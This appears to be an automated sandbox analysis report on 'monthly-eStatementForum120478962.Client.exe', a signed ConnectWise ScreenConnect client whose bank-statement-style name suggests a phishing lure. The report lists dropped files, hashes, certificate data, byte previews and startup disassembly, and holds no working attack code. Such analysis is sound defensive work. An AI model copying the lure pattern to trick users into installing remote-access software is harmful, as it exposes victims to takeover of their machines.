                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):87
                                                                                                                                                                                                                                                                  Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                                  MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                                  SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                                  SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                                  SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                  Entropy (8bit):4.416874755860817
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:Scifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNP5+:/i58oSWIZBk2MM6AFBFo
                                                                                                                                                                                                                                                                  MD5:C0CBA4248B71C41D7366B4C8C55AB5AE
                                                                                                                                                                                                                                                                  SHA1:7EA5CAD025A1E47B00A71F81AF3A9B44E1B520C3
                                                                                                                                                                                                                                                                  SHA-256:B4A2CBEEDC95CA03A131B5DD38675F16B2607DB6683AED2600283DFE236E0A2C
                                                                                                                                                                                                                                                                  SHA-512:6148434F265CE40FCDB03BDFF51314A03CD00E062B35CAF3ED5D83A12F741926A7A35A13B011E4348F1F3C38FCF842BAA52DD6E79A7E261865047253F7347904
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.?..1...............................................................................................................................................................................................................................................................................................................................................P(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):6.514403774293619
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                                  File size:83'376 bytes
                                                                                                                                                                                                                                                                  MD5:27bd2490fd75556aab2df57ea7c1147f
                                                                                                                                                                                                                                                                  SHA1:4eb9656ede1fed23fdaeb67815afcd489ded0f77
                                                                                                                                                                                                                                                                  SHA256:7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5
                                                                                                                                                                                                                                                                  SHA512:b70743c0c03cad64c9f258db7de324ca083ec15ad922f16460febbe47f018aedcbf83e39d8f2b4a57ff77d71727e11a2585264de9dadb15f0ea18abe1e34b350
                                                                                                                                                                                                                                                                  SSDEEP:1536:JoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYX7gxD:TenkyfPAwiMq0RqRfbaxZJYYX
                                                                                                                                                                                                                                                                  TLSH:0F835B43B5E18875E9730E3118B1D9B4593FBD110EA48EAF3398426A0F351D19E3AE7B
                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                  Entrypoint:0x401489
                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                                                                                  Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                                  Signature Valid:true
                                                                                                                                                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                                  Error Number:0
                                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                                  • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                  call 00007FA13C5671BAh
                                                                                                                                                                                                                                                                  jmp 00007FA13C566C6Fh
                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                                                                  call dword ptr [0040B048h]
                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                  call dword ptr [0040B044h]
                                                                                                                                                                                                                                                                  push C0000409h
                                                                                                                                                                                                                                                                  call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                  call dword ptr [0040B050h]
                                                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                  sub esp, 00000324h
                                                                                                                                                                                                                                                                  push 00000017h
                                                                                                                                                                                                                                                                  call dword ptr [0040B054h]
                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                  je 00007FA13C566DF7h
                                                                                                                                                                                                                                                                  push 00000002h
                                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                                  int 29h
                                                                                                                                                                                                                                                                  mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                                  mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                                  mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                                  mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                                  mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                                  mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                                  mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                                  mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                                  mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                                  mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                                  mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                                  mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                                  pushfd
                                                                                                                                                                                                                                                                  pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                  mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                  mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                  mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                                  mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2db0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
